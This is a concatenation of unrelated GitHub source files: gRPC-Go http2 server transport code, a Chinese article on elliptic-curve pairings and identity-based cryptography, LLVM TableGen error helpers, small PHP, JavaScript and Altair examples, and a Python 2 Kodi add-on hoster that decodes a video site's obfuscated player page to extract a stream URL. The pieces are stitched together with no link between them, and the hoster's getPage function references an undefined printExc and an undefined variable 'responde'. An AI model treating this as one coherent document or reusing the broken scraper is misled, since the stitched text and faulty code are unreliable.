func (t *http2Server) WriteHeader(s *Stream, md metadata.MD) error {
	if s.updateHeaderSent() || s.getState() == streamDone {
		return ErrIllegalHeaderWrite
	}
	s.hdrMu.Lock()
	if md.Len() > 0 {
		if s.header.Len() > 0 {
			s.header = metadata.Join(s.header, md)
		} else {
			s.header = md
		}
	}
	if err := t.writeHeaderLocked(s); err != nil {
		s.hdrMu.Unlock()
		return err
	}
	s.hdrMu.Unlock()
	return nil
}
// writeHeaderLocked assembles the :status/content-type/grpc-encoding fields
// plus s.header metadata and hands the HEADERS frame to the loopy writer.
// Must be called with s.hdrMu held.
func (t *http2Server) writeHeaderLocked(s *Stream) error {
	// TODO(mmukhi): Benchmark if the performance gets better if count the metadata and other header fields
	// first and create a slice of that exact size.
	headerFields := make([]hpack.HeaderField, 0, 2) // at least :status, content-type will be there if none else.
	headerFields = append(headerFields, hpack.HeaderField{Name: ":status", Value: "200"})
	headerFields = append(headerFields, hpack.HeaderField{Name: "content-type", Value: contentType(s.contentSubtype)})
	if s.sendCompress != "" {
		headerFields = append(headerFields, hpack.HeaderField{Name: "grpc-encoding", Value: s.sendCompress})
	}
	headerFields = appendHeaderFieldsFromMD(headerFields, s.header)
	// executeAndPut runs the client's max-header-list-size check and only
	// queues the frame when it passes.
	success, err := t.controlBuf.executeAndPut(t.checkForHeaderListSize, &headerFrame{
		streamID:  s.id,
		hf:        headerFields,
		endStream: false,
		onWrite: func() {
			// Writing headers resets ping-strike accounting (see handlePing).
			atomic.StoreUint32(&t.resetPingStrikes, 1)
		},
	})
	if !success {
		if err != nil {
			return err
		}
		t.closeStream(s, true, http2.ErrCodeInternal, false)
		return ErrHeaderListSizeLimitViolation
	}
	if t.stats != nil {
		// Note: WireLength is not set in outHeader.
		// TODO(mmukhi): Revisit this later, if needed.
		outHeader := &stats.OutHeader{}
		t.stats.HandleRPC(s.Context(), outHeader)
	}
	return nil
}
// WriteStatus sends stream status to the client and terminates the stream.
// There is no further I/O operations being able to perform on this stream.
// TODO(zhaoq): Now it indicates the end of entire stream. Revisit if early
// OK is adopted.
func (t *http2Server) WriteStatus(s *Stream, st *status.Status) error {
	if s.getState() == streamDone {
		return nil
	}
	s.hdrMu.Lock()
	// TODO(mmukhi): Benchmark if the performance gets better if count the metadata and other header fields
	// first and create a slice of that exact size.
	headerFields := make([]hpack.HeaderField, 0, 2) // grpc-status and grpc-message will be there if none else.
	if !s.updateHeaderSent() { // No headers have been sent.
		if len(s.header) > 0 { // Send a separate header frame.
			if err := t.writeHeaderLocked(s); err != nil {
				s.hdrMu.Unlock()
				return err
			}
		} else { // Send a trailer only response.
			headerFields = append(headerFields, hpack.HeaderField{Name: ":status", Value: "200"})
			headerFields = append(headerFields, hpack.HeaderField{Name: "content-type", Value: contentType(s.contentSubtype)})
		}
	}
	headerFields = append(headerFields, hpack.HeaderField{Name: "grpc-status", Value: strconv.Itoa(int(st.Code()))})
	headerFields = append(headerFields, hpack.HeaderField{Name: "grpc-message", Value: encodeGrpcMessage(st.Message())})
	if p := st.Proto(); p != nil && len(p.Details) > 0 {
		stBytes, err := proto.Marshal(p)
		if err != nil {
			// TODO: return error instead, when callers are able to handle it.
			grpclog.Errorf("transport: failed to marshal rpc status: %v, error: %v", p, err)
		} else {
			headerFields = append(headerFields, hpack.HeaderField{Name: "grpc-status-details-bin", Value: encodeBinHeader(stBytes)})
		}
	}
	// Attach the trailer metadata.
	headerFields = appendHeaderFieldsFromMD(headerFields, s.trailer)
	trailingHeader := &headerFrame{
		streamID:  s.id,
		hf:        headerFields,
		endStream: true,
		onWrite: func() {
			atomic.StoreUint32(&t.resetPingStrikes, 1)
		},
	}
	s.hdrMu.Unlock()
	// execute only runs the size check here; the frame itself is queued by
	// finishStream below as part of the stream-cleanup bundle.
	success, err := t.controlBuf.execute(t.checkForHeaderListSize, trailingHeader)
	if !success {
		if err != nil {
			return err
		}
		t.closeStream(s, true, http2.ErrCodeInternal, false)
		return ErrHeaderListSizeLimitViolation
	}
	// Send a RST_STREAM after the trailers if the client has not already half-closed.
	rst := s.getState() == streamActive
	t.finishStream(s, rst, http2.ErrCodeNo, trailingHeader, true)
	if t.stats != nil {
		t.stats.HandleRPC(s.Context(), &stats.OutTrailer{})
	}
	return nil
}
// Write converts the data into HTTP2 data frame and sends it out. Non-nil error
// is returned if it fails (e.g., framing error, transport error).
func (t *http2Server) Write(s *Stream, hdr []byte, data []byte, opts *Options) error {
	if !s.isHeaderSent() { // Headers haven't been written yet.
		if err := t.WriteHeader(s, nil); err != nil {
			if _, ok := err.(ConnectionError); ok {
				return err
			}
			// TODO(mmukhi, dfawley): Make sure this is the right code to return.
			return status.Errorf(codes.Internal, "transport: %v", err)
		}
	} else {
		// Writing headers checks for this condition.
		if s.getState() == streamDone {
			// TODO(mmukhi, dfawley): Should the server write also return io.EOF?
			s.cancel()
			select {
			case <-t.ctx.Done():
				return ErrConnClosing
			default:
			}
			return ContextErr(s.ctx.Err())
		}
	}
	// Add some data to header frame so that we can equally distribute bytes across frames.
	emptyLen := http2MaxFrameLen - len(hdr)
	if emptyLen > len(data) {
		emptyLen = len(data)
	}
	hdr = append(hdr, data[:emptyLen]...)
	data = data[emptyLen:]
	df := &dataFrame{
		streamID: s.id,
		h:        hdr,
		d:        data,
		onEachWrite: func() {
			atomic.StoreUint32(&t.resetPingStrikes, 1)
		},
	}
	// Reserve quota for hdr+data before queueing; s.wq appears to be a
	// write-quota gate (TODO confirm). A failure here means the stream or
	// the whole transport is being torn down.
	if err := s.wq.get(int32(len(hdr) + len(data))); err != nil {
		select {
		case <-t.ctx.Done():
			return ErrConnClosing
		default:
		}
		return ContextErr(s.ctx.Err())
	}
	return t.controlBuf.put(df)
}
// keepalive running in a separate goroutine does the following:
// 1. Gracefully closes an idle connection after a duration of keepalive.MaxConnectionIdle.
// 2. Gracefully closes any connection after a duration of keepalive.MaxConnectionAge.
// 3. Forcibly closes a connection after an additive period of keepalive.MaxConnectionAgeGrace over keepalive.MaxConnectionAge.
// 4. Makes sure a connection is alive by sending pings with a frequency of keepalive.Time and closes a non-responsive connection
// after an additional duration of keepalive.Timeout.
func (t *http2Server) keepalive() {
	p := &ping{}
	var pingSent bool
	maxIdle := time.NewTimer(t.kp.MaxConnectionIdle)
	maxAge := time.NewTimer(t.kp.MaxConnectionAge)
	keepalive := time.NewTimer(t.kp.Time)
	// NOTE: All exit paths of this function should reset their
	// respective timers. A failure to do so will cause the
	// following clean-up to deadlock and eventually leak.
	defer func() {
		if !maxIdle.Stop() {
			<-maxIdle.C
		}
		if !maxAge.Stop() {
			<-maxAge.C
		}
		if !keepalive.Stop() {
			<-keepalive.C
		}
	}()
	for {
		select {
		case <-maxIdle.C:
			t.mu.Lock()
			idle := t.idle
			if idle.IsZero() { // The connection is non-idle.
				t.mu.Unlock()
				maxIdle.Reset(t.kp.MaxConnectionIdle)
				continue
			}
			// Remaining idle budget; non-positive means the deadline passed.
			val := t.kp.MaxConnectionIdle - time.Since(idle)
			t.mu.Unlock()
			if val <= 0 {
				// The connection has been idle for a duration of keepalive.MaxConnectionIdle or more.
				// Gracefully close the connection.
				t.drain(http2.ErrCodeNo, []byte{})
				// Resetting the timer so that the clean-up doesn't deadlock.
				maxIdle.Reset(infinity)
				return
			}
			maxIdle.Reset(val)
		case <-maxAge.C:
			t.drain(http2.ErrCodeNo, []byte{})
			maxAge.Reset(t.kp.MaxConnectionAgeGrace)
			select {
			case <-maxAge.C:
				// Close the connection after grace period.
				t.Close()
				// Resetting the timer so that the clean-up doesn't deadlock.
				maxAge.Reset(infinity)
			case <-t.ctx.Done():
			}
			return
		case <-keepalive.C:
			// t.activity is presumably set elsewhere on inbound traffic
			// (TODO confirm); when set since the last tick, no ping needed.
			if atomic.CompareAndSwapUint32(&t.activity, 1, 0) {
				pingSent = false
				keepalive.Reset(t.kp.Time)
				continue
			}
			if pingSent {
				// No activity since our last ping: consider the client dead.
				t.Close()
				// Resetting the timer so that the clean-up doesn't deadlock.
				keepalive.Reset(infinity)
				return
			}
			pingSent = true
			if channelz.IsOn() {
				atomic.AddInt64(&t.czData.kpCount, 1)
			}
			t.controlBuf.put(p)
			keepalive.Reset(t.kp.Timeout)
		case <-t.ctx.Done():
			return
		}
	}
}
// Close starts shutting down the http2Server transport.
// TODO(zhaoq): Now the destruction is not blocked on any pending streams. This
// could cause some resource issue. Revisit this later.
func (t *http2Server) Close() error {
	t.mu.Lock()
	if t.state == closing {
		t.mu.Unlock()
		return errors.New("transport: Close() was already called")
	}
	t.state = closing
	// Snapshot and detach the active streams while holding the lock so they
	// can be cancelled without it.
	streams := t.activeStreams
	t.activeStreams = nil
	t.mu.Unlock()
	t.controlBuf.finish()
	t.cancel()
	err := t.conn.Close()
	if channelz.IsOn() {
		channelz.RemoveEntry(t.channelzID)
	}
	// Cancel all active streams.
	for _, s := range streams {
		s.cancel()
	}
	if t.stats != nil {
		connEnd := &stats.ConnEnd{}
		t.stats.HandleConn(t.ctx, connEnd)
	}
	return err
}
// deleteStream deletes the stream s from transport's active streams.
// It returns the state the stream was in before being marked done, so the
// caller can tell whether it performed the transition.
func (t *http2Server) deleteStream(s *Stream, eosReceived bool) (oldState streamState) {
	oldState = s.swapState(streamDone)
	if oldState == streamDone {
		// If the stream was already done, return.
		return oldState
	}
	// In case stream sending and receiving are invoked in separate
	// goroutines (e.g., bi-directional streaming), cancel needs to be
	// called to interrupt the potential blocking on other goroutines.
	s.cancel()
	t.mu.Lock()
	if _, ok := t.activeStreams[s.id]; ok {
		delete(t.activeStreams, s.id)
		if len(t.activeStreams) == 0 {
			// Record when the connection went idle (used by keepalive's
			// MaxConnectionIdle handling).
			t.idle = time.Now()
		}
	}
	t.mu.Unlock()
	if channelz.IsOn() {
		if eosReceived {
			atomic.AddInt64(&t.czData.streamsSucceeded, 1)
		} else {
			atomic.AddInt64(&t.czData.streamsFailed, 1)
		}
	}
	return oldState
}
// finishStream closes the stream and puts the trailing headerFrame into controlbuf.
// When the stream was already done, the trailer is not queued.
func (t *http2Server) finishStream(s *Stream, rst bool, rstCode http2.ErrCode, hdr *headerFrame, eosReceived bool) {
	oldState := t.deleteStream(s, eosReceived)
	// If the stream is already closed, then don't put trailing header to controlbuf.
	if oldState == streamDone {
		return
	}
	// Piggy-back the stream cleanup (and optional RST_STREAM) on the trailer
	// frame so it happens after the trailers are written.
	hdr.cleanup = &cleanupStream{
		streamID: s.id,
		rst:      rst,
		rstCode:  rstCode,
		onWrite:  func() {},
	}
	t.controlBuf.put(hdr)
}
// closeStream clears the footprint of a stream when the stream is not needed any more.
// Unlike finishStream, no trailer is sent; only the cleanup (and optional
// RST_STREAM with rstCode) is queued.
func (t *http2Server) closeStream(s *Stream, rst bool, rstCode http2.ErrCode, eosReceived bool) {
	t.deleteStream(s, eosReceived)
	t.controlBuf.put(&cleanupStream{
		streamID: s.id,
		rst:      rst,
		rstCode:  rstCode,
		onWrite:  func() {},
	})
}
// RemoteAddr returns the peer's network address.
func (t *http2Server) RemoteAddr() net.Addr {
	return t.remoteAddr
}
// Drain starts a graceful shutdown of the transport with an empty
// GOAWAY debug payload.
func (t *http2Server) Drain() {
	t.drain(http2.ErrCodeNo, []byte{})
}
// drain initiates graceful shutdown: it creates drainChan (whose closing, in
// handlePing, signals receipt of the goaway-ping ack) and queues a "heads up"
// GOAWAY. It is a no-op if a drain is already in progress.
func (t *http2Server) drain(code http2.ErrCode, debugData []byte) {
	t.mu.Lock()
	defer t.mu.Unlock()
	if t.drainChan != nil {
		return
	}
	t.drainChan = make(chan struct{})
	t.controlBuf.put(&goAway{code: code, debugData: debugData, headsUp: true})
}
// goAwayPing is the fixed payload of the ping sent along with a graceful
// GOAWAY; handlePing recognizes its ack and closes drainChan.
var goAwayPing = &ping{data: [8]byte{1, 6, 1, 8, 0, 3, 3, 9}}

// Handles outgoing GoAway and returns true if loopy needs to put itself
// in draining mode.
func (t *http2Server) outgoingGoAwayHandler(g *goAway) (bool, error) {
	t.mu.Lock()
	if t.state == closing { // TODO(mmukhi): This seems unnecessary.
		t.mu.Unlock()
		// The transport is closing.
		return false, ErrConnClosing
	}
	sid := t.maxStreamID
	if !g.headsUp {
		// Stop accepting more streams now.
		t.state = draining
		if len(t.activeStreams) == 0 {
			g.closeConn = true
		}
		t.mu.Unlock()
		if err := t.framer.fr.WriteGoAway(sid, g.code, g.debugData); err != nil {
			return false, err
		}
		if g.closeConn {
			// Abruptly close the connection following the GoAway (via
			// loopywriter). But flush out what's inside the buffer first.
			t.framer.writer.Flush()
			return false, fmt.Errorf("transport: Connection closing")
		}
		return true, nil
	}
	t.mu.Unlock()
	// For a graceful close, send out a GoAway with stream ID of MaxUInt32,
	// Follow that with a ping and wait for the ack to come back or a timer
	// to expire. During this time accept new streams since they might have
	// originated before the GoAway reaches the client.
	// After getting the ack or timer expiration send out another GoAway this
	// time with an ID of the max stream server intends to process.
	if err := t.framer.fr.WriteGoAway(math.MaxUint32, http2.ErrCodeNo, []byte{}); err != nil {
		return false, err
	}
	if err := t.framer.fr.WritePing(false, goAwayPing.data); err != nil {
		return false, err
	}
	go func() {
		timer := time.NewTimer(time.Minute)
		defer timer.Stop()
		select {
		case <-t.drainChan:
		case <-timer.C:
		case <-t.ctx.Done():
			return
		}
		// Queue the second, non-headsUp GOAWAY carrying the real max
		// stream ID.
		t.controlBuf.put(&goAway{code: g.code, debugData: g.debugData})
	}()
	return false, nil
}
// ChannelzMetric returns a snapshot of this transport's channelz socket
// counters and metadata.
func (t *http2Server) ChannelzMetric() *channelz.SocketInternalMetric {
	s := channelz.SocketInternalMetric{
		StreamsStarted:                   atomic.LoadInt64(&t.czData.streamsStarted),
		StreamsSucceeded:                 atomic.LoadInt64(&t.czData.streamsSucceeded),
		StreamsFailed:                    atomic.LoadInt64(&t.czData.streamsFailed),
		MessagesSent:                     atomic.LoadInt64(&t.czData.msgSent),
		MessagesReceived:                 atomic.LoadInt64(&t.czData.msgRecv),
		KeepAlivesSent:                   atomic.LoadInt64(&t.czData.kpCount),
		LastRemoteStreamCreatedTimestamp: time.Unix(0, atomic.LoadInt64(&t.czData.lastStreamCreatedTime)),
		LastMessageSentTimestamp:         time.Unix(0, atomic.LoadInt64(&t.czData.lastMsgSentTime)),
		LastMessageReceivedTimestamp:     time.Unix(0, atomic.LoadInt64(&t.czData.lastMsgRecvTime)),
		LocalFlowControlWindow:           int64(t.fc.getSize()),
		SocketOptions:                    channelz.GetSocketOption(t.conn),
		LocalAddr:                        t.localAddr,
		RemoteAddr:                       t.remoteAddr,
		// RemoteName :
	}
	if au, ok := t.authInfo.(credentials.ChannelzSecurityInfo); ok {
		s.Security = au.GetSecurityValue()
	}
	s.RemoteFlowControlWindow = t.getOutFlowWindow()
	return &s
}
// IncrMsgSent bumps the channelz sent-message counter and timestamp.
func (t *http2Server) IncrMsgSent() {
	atomic.AddInt64(&t.czData.msgSent, 1)
	atomic.StoreInt64(&t.czData.lastMsgSentTime, time.Now().UnixNano())
}
// IncrMsgRecv bumps the channelz received-message counter and timestamp.
func (t *http2Server) IncrMsgRecv() {
	atomic.AddInt64(&t.czData.msgRecv, 1)
	atomic.StoreInt64(&t.czData.lastMsgRecvTime, time.Now().UnixNano())
}
// getOutFlowWindow asks the loopy writer (via the control buffer) for the
// current outbound flow-control window size. It returns -1 when the transport
// is closed and -2 when the one-second timeout expires first.
func (t *http2Server) getOutFlowWindow() int64 {
	resp := make(chan uint32, 1)
	timer := time.NewTimer(time.Second)
	defer timer.Stop()
	t.controlBuf.put(&outFlowControlSizeRequest{resp})
	select {
	case sz := <-resp:
		return int64(sz)
	case <-t.ctxDone:
		return -1
	case <-timer.C:
		return -2
	}
}
// getJitter returns a random duration drawn uniformly from +/- 10% of v,
// or zero when v is infinity.
func getJitter(v time.Duration) time.Duration {
	if v == infinity {
		return 0
	}
	// Generate a jitter between +/- 10% of the value.
	bound := int64(v / 10)
	return time.Duration(grpcrand.Int63n(2*bound) - bound)
}
| {
"pile_set_name": "Github"
} |
# pairing的初步
## 一、ECC pairing的介绍
在前面提到了RSA ACC累加器,它的缺点是需要不断地重复进行运算证明,速度还是一个硬伤。这时就有人提出了Pairing:二元映射。特别是基于ECC的Pairing,效率更好。
</br>
不过在刚刚提出这个算法时,e(P,Q)的计算量也是巨大的,实用性受限也就不言而喻。但随着谷歌等一些公司的投入和大牛们不断的努力,运算的时间已经从几分钟缩减到微秒级。
</br>
2008年,Vercauteren提出了最优Ate Pairing,这个是目前知道的最快的算法。
## 二、标识密码体系(IBC)和应用
在传统的PKI加密体系中,需要公开一个公钥和自己保密一个私钥。但是在传送公钥时,很有可能出现问题,此时提出了CA认证。但是这种方式一是太复杂,另外需要额外维护一个中心化的节点,一旦出问题也就有问题了。
</br>
为了解决这个问题,以色列密码学家在1984年提出了标识密码体系。即不再使用上述的方式来生成公私钥对,而是由客户标识如:姓名、IP、手机号以及邮箱等来作为公钥。私钥则由密钥中心依据系统主密钥和用户标识计算得出。直到2000年,业界提出基于椭圆曲线数学难题的配对构造算法(即上面第一节的介绍),才解决了这个根本的问题。
</br>
在我国,2008年将其引入到国密的SM9中,目前在这方面的研究工作还是有很多人在推进。网上可以找到N多SM9的实现的算法,包括各个科研机构中开源的相关c++的源码。
## 三、主要原理
IBC密码体系主要有三块:
</br>
1)IBE加解密算法组:
</br>
其基本的步骤为:生成系统参数和主密钥并保管好,其中系统参数是公开的;然后利用这二者和用户身份标识生成私钥,当然,标识即为公钥;利用系统和公钥对相关数据进行加密,得到密文;然后相关方利用系统参数和私钥解密。
2)IBS签名算法组:
</br>
签名类似,不同点在于用私钥和系统参数产生签名,然后用此签名和系统参数及公钥验证。原理和普通的PKI体系没有太大不同。
3)IBKA身份认证协议:
</br>
认证的协议首先由发起方生成一个随机数和时间戳,发送给认证方;认证方通过随机数和时间戳生成待签报文,用私钥生成数字签名发回给发起方;发起方利用认证方的公钥对数字签名进行验证。
</br>
IBC的优势在于运算数据小,成本低,不需要第三方,但是目前看来这个技术还在发展中,不能说其可以完全替代PKI体系。
## 四、区块链上的应用
在区块链上的应用也和RSA ACC类似,正处于研究阶段,也是用来对相关的验证数据进行替代,目前真正商用的还没有看到,研究的倒是出现了一些。
## 五、总结
加密体系是一个比较深的东西,对一些原理和算法的过程理解需要不断的完善,欢迎指正。
| {
"pile_set_name": "Github"
} |
sortName: Lozano
displayName: Ruben Lozano
url: https://rubenlozano.com | {
"pile_set_name": "Github"
} |
<?php
// NOTE(review): the "case" below is a boolean expression, not a constant
// label; PHP compares its result loosely (==) against the switch subject $a,
// so the branch runs when $a loosely equals the substr() comparison result.
switch($a) {
    case substr($b, 0, 1) == 'c':
        d($e['f'], 'g');
}
?>
"pile_set_name": "Github"
} |
//===- Error.cpp - tblgen error handling helper routines --------*- C++ -*-===//
//
// The LLVM Compiler Infrastructure
//
// This file is distributed under the University of Illinois Open Source
// License. See LICENSE.TXT for details.
//
//===----------------------------------------------------------------------===//
//
// This file contains error handling helper routines to pretty-print diagnostic
// messages from tblgen.
//
//===----------------------------------------------------------------------===//
#include "llvm/TableGen/Error.h"
#include "llvm/ADT/Twine.h"
#include "llvm/Support/Signals.h"
#include "llvm/Support/raw_ostream.h"
#include <cstdlib>
namespace llvm {
SourceMgr SrcMgr;
unsigned ErrorsPrinted = 0;
static void PrintMessage(ArrayRef<SMLoc> Loc, SourceMgr::DiagKind Kind,
const Twine &Msg) {
// Count the total number of errors printed.
// This is used to exit with an error code if there were any errors.
if (Kind == SourceMgr::DK_Error)
++ErrorsPrinted;
SMLoc NullLoc;
if (Loc.empty())
Loc = NullLoc;
SrcMgr.PrintMessage(Loc.front(), Kind, Msg);
for (unsigned i = 1; i < Loc.size(); ++i)
SrcMgr.PrintMessage(Loc[i], SourceMgr::DK_Note,
"instantiated from multiclass");
}
void PrintWarning(ArrayRef<SMLoc> WarningLoc, const Twine &Msg) {
PrintMessage(WarningLoc, SourceMgr::DK_Warning, Msg);
}
void PrintWarning(const char *Loc, const Twine &Msg) {
SrcMgr.PrintMessage(SMLoc::getFromPointer(Loc), SourceMgr::DK_Warning, Msg);
}
void PrintWarning(const Twine &Msg) {
errs() << "warning:" << Msg << "\n";
}
void PrintError(ArrayRef<SMLoc> ErrorLoc, const Twine &Msg) {
PrintMessage(ErrorLoc, SourceMgr::DK_Error, Msg);
}
void PrintError(const char *Loc, const Twine &Msg) {
SrcMgr.PrintMessage(SMLoc::getFromPointer(Loc), SourceMgr::DK_Error, Msg);
}
void PrintError(const Twine &Msg) {
errs() << "error:" << Msg << "\n";
}
void PrintFatalError(const Twine &Msg) {
PrintError(Msg);
// The following call runs the file cleanup handlers.
sys::RunInterruptHandlers();
std::exit(1);
}
void PrintFatalError(ArrayRef<SMLoc> ErrorLoc, const Twine &Msg) {
PrintError(ErrorLoc, Msg);
// The following call runs the file cleanup handlers.
sys::RunInterruptHandlers();
std::exit(1);
}
} // end namespace llvm
| {
"pile_set_name": "Github"
} |
"use strict";
var value = require("../../../object/valid-value")
, toInteger = require("../../../number/to-integer")
, max = Math.max
, min = Math.min;
module.exports = function (searchString/*, position*/) {
var start, self = String(value(this));
start = min(max(toInteger(arguments[1]), 0), self.length);
return self.indexOf(searchString, start) === start;
};
| {
"pile_set_name": "Github"
} |
"""
Brushing Scatter Plot to show data on a table
---------------------------------------------
A scatter plot of the cars dataset, with data tables for horsepower, MPG, and origin.
The tables update to reflect the selection on the scatter plot.
"""
# category: scatter plots
import altair as alt
from vega_datasets import data

cars = data.cars()

# Interval selection used to brush points on the scatter plot.
brush = alt.selection(type='interval')

# Scatter plot; points outside the brushed region are greyed out.
points = alt.Chart(cars).mark_point().encode(
    x='Horsepower:Q',
    y='Miles_per_Gallon:Q',
    color=alt.condition(brush, 'Cylinders:O', alt.value('grey')),
).add_selection(brush)

# Shared base for the text columns: one row per brushed record, ranked and
# capped at the first 20 rows.
ranked_text = alt.Chart(cars).mark_text().encode(
    y=alt.Y('row_number:O', axis=None),
).transform_window(
    row_number='row_number()'
).transform_filter(
    brush
).transform_window(
    rank='rank(row_number)'
).transform_filter(
    alt.datum.rank < 20
)

# One text column per field of interest.
horsepower = ranked_text.encode(text='Horsepower:N').properties(title='Horsepower')
mpg = ranked_text.encode(text='Miles_per_Gallon:N').properties(title='MPG')
origin = ranked_text.encode(text='Origin:N').properties(title='Origin')
text = alt.hconcat(horsepower, mpg, origin)  # Combine data tables

# Final chart: scatter plot beside the data tables, with independent legends.
alt.hconcat(
    points,
    text
).resolve_legend(
    color="independent"
)
"pile_set_name": "Github"
} |
#-*- coding: utf-8 -*-
#Vstream https://github.com/Kodi-vStream/venom-xbmc-addons
from resources.lib.handler.requestHandler import cRequestHandler
from resources.lib.parser import cParser
from resources.hosters.hoster import iHoster
import urllib, urllib2
import re, base64
import htmlentitydefs
import cookielib
try:
from StringIO import StringIO
import gzip
except:
pass
class cHoster(iHoster):
HOST = 'Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0'
HEADER = None
def __init__(self):
self.__sDisplayName = 'Netu'
self.__sFileName = self.__sDisplayName
self.proxyURL = ''
self.useProxy = False
def getDisplayName(self):
return self.__sDisplayName
def setDisplayName(self, sDisplayName):
self.__sDisplayName = sDisplayName + ' [COLOR skyblue]'+self.__sDisplayName+'[/COLOR]'
def setFileName(self, sFileName):
self.__sFileName = sFileName
def getFileName(self):
return self.__sFileName
def getPluginIdentifier(self):
return 'hqq'
def isDownloadable(self):
return True
def isJDownloaderable(self):
return True
def getPattern(self):
return ''
def __getIdFromUrl(self, sUrl):
sPattern = "http://exashare.com/([^<]+)"
oParser = cParser()
aResult = oParser.parse(sUrl, sPattern)
if (aResult[0] == True):
return aResult[1][0]
return ''
def __getPhpSessionId(self, aHeader):
sReponseCookie = aHeader.getheader("Set-Cookie")
aResponseCookies = sReponseCookie.split(";")
return aResponseCookies[0]
def setUrl(self, sUrl):
self.__sUrl = str(sUrl)
# sPattern = 'http://(?:www.|embed.)exashare.(?:com)/(?:video/|embed\-)?([0-9a-z]+)'
# oParser = cParser()
# aResult = oParser.parse(sUrl, sPattern)
# self.__sUrl = 'http://exashare.com/embed-'+str(aResult[1][0])+'.html'
def checkUrl(self, sUrl):
return True
def getUrl(self):
return self.__sUrl
def getMediaLink(self):
return self.__getMediaLinkForGuest()
def getURLRequestData(self, params = {}, post_data = None):
def urlOpen(req, customOpeners):
if len(customOpeners) > 0:
opener = urllib2.build_opener( *customOpeners )
response = opener.open(req)
else:
response = urllib2.urlopen(req)
return response
cj = cookielib.LWPCookieJar()
response = None
req = None
out_data = None
opener = None
if 'host' in params:
host = params['host']
else:
host = self.HOST
if 'header' in params:
headers = params['header']
elif None != self.HEADER:
headers = self.HEADER
else:
headers = { 'User-Agent' : host }
print 'pCommon - getURLRequestData() -> params: ' + str(params)
#print 'pCommon - getURLRequestData() -> headers: ' + str(headers)
customOpeners = []
#cookie support
if params.get('use_cookie', False):
customOpeners.append( urllib2.HTTPCookieProcessor(cj) )
if params.get('load_cookie', False):
cj.load(params['cookiefile'], ignore_discard = True)
#proxy support
# if self.useProxy == True:
# print 'getURLRequestData USE PROXY'
# customOpeners.append( urllib2.ProxyHandler({"http":self.proxyURL}) )
if None != post_data:
#print 'pCommon - getURLRequestData() -> post data: ' + str(post_data)
if params.get('raw_post_data', False):
dataPost = post_data
else:
dataPost = urllib.urlencode(post_data)
req = urllib2.Request(params['url'], dataPost, headers)
else:
req = urllib2.Request(params['url'], None, headers)
#print req
if not params.get('return_data', False):
out_data = urlOpen(req, customOpeners)
else:
gzip_encoding = False
try:
response = urlOpen(req, customOpeners)
if response.info().get('Content-Encoding') == 'gzip':
gzip_encoding = True
data = response.read()
print response.info()
response.close()
except urllib2.HTTPError, e:
print "out"
if e.code == 404:
print '!!!!!!!! 404: getURLRequestData - page not found handled'
if e.fp.info().get('Content-Encoding') == 'gzip':
gzip_encoding = True
data = e.fp.read()
#e.msg
#e.headers
else:
if e.code in [300, 302, 303, 307] and params.get('use_cookie', False) and params.get('save_cookie', False):
new_cookie = e.fp.info().get('Set-Cookie', '')
print ">>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> new_cookie[%s]" % new_cookie
#for cookieKey in params.get('cookie_items', {}).keys():
# cj.clear('', '/', cookieKey)
cj.save(params['cookiefile'], ignore_discard = True)
raise e
try:
if gzip_encoding:
print 'Content-Encoding == gzip'
buf = StringIO(data)
f = gzip.GzipFile(fileobj=buf)
out_data = f.read()
else:
out_data = data
except:
out_data = data
if params.get('use_cookie', False) and params.get('save_cookie', False):
cj.save(params['cookiefile'], ignore_discard = True)
return out_data
def getPage(self, url, addParams = {}, post_data = None):
try:
addParams['url'] = url
if 'return_data' not in addParams:
addParams['return_data'] = True
response = self.getURLRequestData(addParams, post_data)
status = True
except:
printExc()
response = None
status = False
print responde
return (status, response)
def getDataBeetwenReMarkers(self, data, pattern1, pattern2, withMarkers=True):
match1 = pattern1.search(data)
if None == match1 or -1 == match1.start(0): return False, ''
match2 = pattern2.search(data[match1.end(0):])
if None == match2 or -1 == match2.start(0): return False, ''
if withMarkers:
return True, data[match1.start(0): (match1.end(0) + match2.end(0)) ]
else:
return True, data[match1.end(0): (match1.end(0) + match2.start(0)) ]
def parseNETUTV(self, url):
#print("parserDIVEXPRESS url[%s]" % url)
# example video: http://netu.tv/watch_video.php?v=WO4OAYA4K758
def OIO(data, _0x84de):
_0lllOI = _0x84de[0];
enc = _0x84de[1];
i = 0;
while i < len(data):
h1 = _0lllOI.find(data[i]);
h2 = _0lllOI.find(data[i+1]);
h3 = _0lllOI.find(data[i+2]);
h4 = _0lllOI.find(data[i+3]);
i += 4;
bits = h1 << 18 | h2 << 12 | h3 << 6 | h4;
o1 = bits >> 16 & 0xff;
o2 = bits >> 8 & 0xff;
o3 = bits & 0xff;
if h3 == 64:
enc += chr(o1);
else:
if h4 == 64:
enc += chr(o1) + chr(o2);
else:
enc += chr(o1) + chr(o2) + chr(o3);
return enc
def _0ll(string, _0x84de):
ret = _0x84de[1]
i = len(string) - 1
while i >= 0:
ret += string[i]
i -= 1
return ret
#printDBG("parseNETUTV url[%s]\n" % url)
#http://netu.tv/watch_video.php?v=ODM4R872W3S9
match = re.search("=([0-9A-Z]+?)[^0-9^A-Z]", url + '|' )
playerUrl = "http://hqq.tv/player/embed_player.php?vid=%s&autoplay=no" % match.group(1)
print playerUrl
HTTP_HEADER= { 'User-Agent':'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:21.0) Gecko/20100101 Firefox/21.0',
'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' }
#HTTP_HEADER['Referer'] = url
#data = self.getPage(playerUrl, {'header' : HTTP_HEADER})
oRequestHandler = cRequestHandler(self.__sUrl)
data = oRequestHandler.request()
data = base64.b64decode(re.search('base64\,([^"]+?)"', data).group(1))
l01 = re.search("='([^']+?)'", data).group(1)
_0x84de = re.search("var _0x84de=\[([^]]+?)\]", data).group(1)
_0x84de = re.compile('"([^"]*?)"').findall(_0x84de)
data = OIO( _0ll(l01, _0x84de), _0x84de )
data = re.search("='([^']+?)'", data).group(1).replace('%', '\\').decode('unicode-escape').encode('UTF-8')
data = re.compile('<input name="([^"]+?)" [^>]+? value="([^"]+?)">').findall(data)
post_data = {}
for idx in range(len(data)):
post_data[ data[idx][0] ] = data[idx][1]
oRequest = cRequestHandler(playerUrl)
oRequest.setRequestType(cRequestHandler.REQUEST_TYPE_POST)
oRequest.addHeaderEntry('Referer', playerUrl)
for aEntry in data:
oRequest.addParameters(aEntry[0], aEntry[1])
data = oRequest.request()
aHeader = oRequest.getResponseHeader();
RealUrl = oRequest.getRealUrl()
